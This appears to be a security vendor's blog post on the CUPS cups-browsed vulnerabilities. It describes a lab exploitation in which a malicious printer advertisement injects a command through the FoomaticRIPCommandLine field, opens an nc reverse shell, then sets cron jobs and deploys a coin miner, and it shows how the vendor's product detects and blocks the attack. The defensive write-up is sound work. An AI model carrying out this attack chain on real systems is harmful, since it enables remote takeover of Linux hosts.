A series of critical severity bugs in the CUPS printers discovery mechanism (cups-browsed) affecting Linux hosts was recently disclosed. The vulnerabilities can be leveraged to automatically install a malicious printer and perform unauthenticated remote code execution attacks. The details about the vulnerabilities as well as exploit code is already available in the public domain. Uptycs released details about the vulnerabilities here.
In this blog we want to showcase how Uptycs detects and remediates exploitation attempts on a vulnerable machine.
CUPS Exploitation
For the purpose of exploitation, we used this poc.
From the attacker machine, we run the exploit script to advertise our malicious printer with the name “BestPrinter” which would execute the nc command for reverse shell execution as shown in the image below.
Fig 1. Running the exploit script
The above command creates a multicast DNS query packet for advertising the malicious printer.
In the victim machine, when we try to print a page from Firefox, the malicious printer appears in the printer list.
Fig 2. Malicious printer appears in victim machine
In the background, an IPP (Internet Printing Protocol) request packet is generated by the victim host to get more attributes about the printer. The exploit script responds by sending a crafted IPP Response with the exploit command present in the “FoomaticRIPCommandLine” field. This essentially tells the CUPS system to execute the foomatic-rip filter binary when a print job is sent to this printer. A malicious temporary PPD (PostScript Printer Description) file for a printer is generated.
Fig 3. IPP request and response containing exploit command
Victim has to manually click on the “Print” button to trigger the exploitation.
The exploit runs successfully to trigger a reverse shell. We execute further commands to get system information, set cron jobs and further deploy CoinMiner.
Fig 4. Reverse shell connection is established
Fig 5. Post exploitation activities
Vulnerability Detection
Uptycs automatically scans the entire infrastructure, hosts, containers, images and Lambda functions for impact and surfaces that on a dashboard.
Fig 6. Trending Vulnerabilities
You could get a detailed vulnerability report by double clicking into the vulnerability.
Fig 7. Vulnerability Scan Report for CUPS CVEs.
Vulnerabilities are prioritized by evaluating the environment in which the vulnerability is found. Information such as internet exposure, a process from a vulnerable package id currently running and the process is running in a privileged mode. Mere presence of a package is lower priority than if a process from the vulnerable package is running and if it is running as a privileged user. If the asset is exposed to the internet (receiving inbound connection from public IP addresses) the priority is further increased.
Fig 8. Vulnerable process and package details
Uptycs does not stop at just detecting the vulnerability. Our customers' infrastructure is protected from attackers leveraging the vulnerability to commit malicious activity.
Alerts Triggered in Uptycs
Uptycs detects exploitation activities and protects users from getting attacked. Uptycs in a protect mode blocks the exploitation activity at the initial stage by killing the malicious process launched by the attacker thereby stopping the attacker from compromising the target machine. In a detect mode the exploitation is not blocked but all of the activity of the attacker is alerted and deep telemetry is collected for investigators to conduct forensic activity.
Exploitation in Protect Mode
When Uptycs is configured in Protect mode, the attack is stopped when the reverse shell is executed by the exploit script.
Fig 9. Attack is blocked in Protect mode
Fig 10. Detection view in Protect mode
Exploitation in Detect Mode
When we performed the attack in Detect mode, we see the full attack chain where the foomatic-rip process, whose parent is cupsd process, launches bash to execute reverse shell and coinminer attacks.
Fig 11. Detection view in Detect mode
Connect with our Team
The Uptycs team is ready to help. If you would like to learn more about the Uptycs Platform, speak to one of our experts, and see a demo of how to investigate and remediate issues like this one contact us today.